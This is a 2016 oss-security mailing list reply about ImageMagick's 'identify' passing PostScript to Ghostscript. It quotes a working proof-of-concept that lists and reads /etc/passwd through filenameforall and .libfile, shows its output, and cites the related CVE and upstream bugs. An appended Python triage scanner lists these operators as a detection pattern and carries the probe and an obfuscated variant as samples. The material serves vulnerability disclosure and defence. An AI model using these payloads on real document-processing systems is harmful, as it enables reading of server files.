Message-ID: <CAJ_zFk+T7TD7Ke=k7kbRbxGfnyARQXX1YxGehshKj11RxQD6BA@mail.gmail.com>
Date: Thu, 29 Sep 2016 05:02:19 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: oss-security@...ts.openwall.com
Subject: Re: ImageMagick identify "d:" hangs

On Wed, Sep 28, 2016 at 11:25 PM, Florian Weimer <fw@...eb.enyo.de> wrote:
>
> * Tavis Ormandy:
>
> > Here is the code I'm testing with (Note: I really don't know much
> > postscript - and I hate it).
> >
> > $ cat test.ps
> > /dumpname {
> >     dup                         % copy filename
> >     dup                         % copy filename
> >     print                       % print filename
> >     (\n) print                  % print newline
> >     status                      % stat filename
> >     {
> >         (stat succeeded\n) print
> >         ( ctime:) print
> >         64 string cvs print
> >         ( atime:) print
> >         64 string cvs print
> >         ( size:) print
> >         64 string cvs print
> >         ( blocks:) print
> >         64 string cvs print
> >         (\n) print
> >         (\n) print
> >     }{
> >         (unable to stat\n\n) print
> >     } ifelse
> >     .libfile                    % open as library
> >     {
> >         (.libfile returned file\n\n) print
> >         64 string readstring
> >         pop                     % discard result (should probably test)
> >         print
> >         (\n) print
> >     }{
> >         (.libfile returned string\n) print
> >         print
> >         (\n) print
> >     } ifelse
> > } def
> >
> > (/etc/pass*) /dumpname load 256 string filenameforall
>
> filenameforall was fixed as part of this:
>
> http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=ab109aaeb3ddba59518b036fb288402a65cf7ce8
> http://bugs.ghostscript.com/show_bug.cgi?id=694724
>
> This also covers getenv and has already been assigned CVE-2013-5653.

Thanks Florian, that explains it, although the distros do not appear to
have picked that patch up.

> > $ identify test.ps
> > /etc/passwd
> > stat succeeded
> >  ctime:1474998792 atime:1474998792 size:2662 blocks:8
> >
> > .libfile returned file
>
> .libfile is not yet fixed upstream. I reported this upstream:
>
> http://bugs.ghostscript.com/show_bug.cgi?id=697169

Thanks - seems like bad news for any automated image/document processing.

Tavis.
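One check an operator of an automated image/document pipeline might want after reading this thread, as an added example that is not part of the thread and not code from Ghostscript or ImageMagick: a small Python triage scanner that flags PostScript input reaching for the host through the operators named above (filenameforall, status, .libfile, getenv). The extension of that list to the standard PostScript file operators (file, deletefile, renamefile, run), the function names, and the three sample documents are my own assumptions and constructed inputs. The tokenizer skips `%` comments and `(...)` string literals (nested parentheses and backslash escapes included) so that a comment or a text string mentioning "status" does not trip it, and it still reports an exact operator name sitting in a string, which is the shape of the usual `(name) cvn cvx exec` indirection.

```python
"""
Added example (not from the oss-security thread): triage scanner that
reports PostScript tokens touching the host. Assumed operator list,
assumed function names, constructed sample inputs.
"""
import re

# The first four operators are the ones discussed in the thread; the rest
# are standard file operators a document-processing pipeline has no reason
# to see in user-supplied input (assumption: extend to taste).
HOST_ACCESS_OPERATORS = frozenset({
    "filenameforall", "status", ".libfile", "getenv",
    "file", "deletefile", "renamefile", "run",
})

# A name token runs until whitespace or a PostScript delimiter; up to two
# leading slashes cover /literal and //immediate names.
_TOKEN_RE = re.compile(r"/{0,2}[^\s()<>\[\]{}/%]*")


def ps_tokens(src):
    """Yield (kind, text): kind is 'name' (executable name), 'literal'
    (/name) or 'string'. Comments are skipped; string contents are
    returned but never tokenized. Triage lexer, not a full PS parser."""
    i, n = 0, len(src)
    while i < n:
        c = src[i]
        if c.isspace():
            i += 1
        elif c == "%":                       # comment runs to end of line
            nl = src.find("\n", i)
            i = n if nl < 0 else nl + 1
        elif c == "(":                       # (...) string, parens nest
            depth, i = 1, i + 1
            start = i
            while i < n and depth:
                ch = src[i]
                if ch == "\\":               # skip escaped character
                    i += 2
                    continue
                if ch == "(":
                    depth += 1
                elif ch == ")":
                    depth -= 1
                i += 1
            yield ("string", src[start:i - 1])
        elif c == "<" and not src.startswith("<<", i):   # <hex> string
            end = src.find(">", i)
            i = n if end < 0 else end + 1
            yield ("string", "")
        elif c in "{}[]<>":                  # procedure/array/dict marks
            yield ("name", c)
            i += 1
        elif c == ")":                       # stray close paren
            i += 1
        else:
            tok = _TOKEN_RE.match(src, i).group(0)
            if not tok:
                i += 1
                continue
            i += len(tok)
            if tok.startswith("/"):
                yield ("literal", tok.lstrip("/"))
            else:
                yield ("name", tok)


def scan_postscript(src):
    """Return sorted (operator, kind) findings. 'name' is a direct call;
    'literal' is /name (runnable via load/exec); 'string' is an exact
    operator name inside a string literal (runnable via cvn cvx exec)."""
    findings = {(text, kind) for kind, text in ps_tokens(src)
                if text in HOST_ACCESS_OPERATORS}
    return sorted(findings)


def is_suspicious(src):
    return bool(scan_postscript(src))


# Constructed sample 1: the probe shape from the thread, trimmed.
PROBE_PS = """%!PS
/dumpname {
  dup print (\\n) print      % print filename
  status { pop pop pop pop } if
  .libfile { 64 string readstring pop print } { print } ifelse
} def
(/etc/pass*) /dumpname load 256 string filenameforall
"""

# Constructed sample 2: benign EPS whose comments and text mention operators.
BENIGN_EPS = """%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: 0 0 200 100
% the word status in a comment, and getenv in a string, are harmless
/Helvetica findfont 12 scalefont setfont
20 40 moveto (status: run getenv (nested) ok) show
showpage
"""

# Constructed sample 3: the same access reached indirectly.
OBFUSCATED_PS = """%!PS
(/etc/passwd) (.libfile) cvn cvx exec
(/etc/pass*) { print } 256 string /filenameforall load exec
"""

if __name__ == "__main__":
    for label, doc in (("probe", PROBE_PS), ("benign", BENIGN_EPS),
                       ("obfuscated", OBFUSCATED_PS)):
        print(label, scan_postscript(doc))
```

This is a triage aid, not a sandbox: an operator name assembled at run time from pieces (two strings joined before `cvn`) evades it, and nothing here limits what Ghostscript will do once it runs the file. The fix the thread points to is the upstream Ghostscript patches Florian cites, and distributions actually shipping them; until then, the scanner only tells you which uploads deserve a closer look before `identify` hands them to Ghostscript.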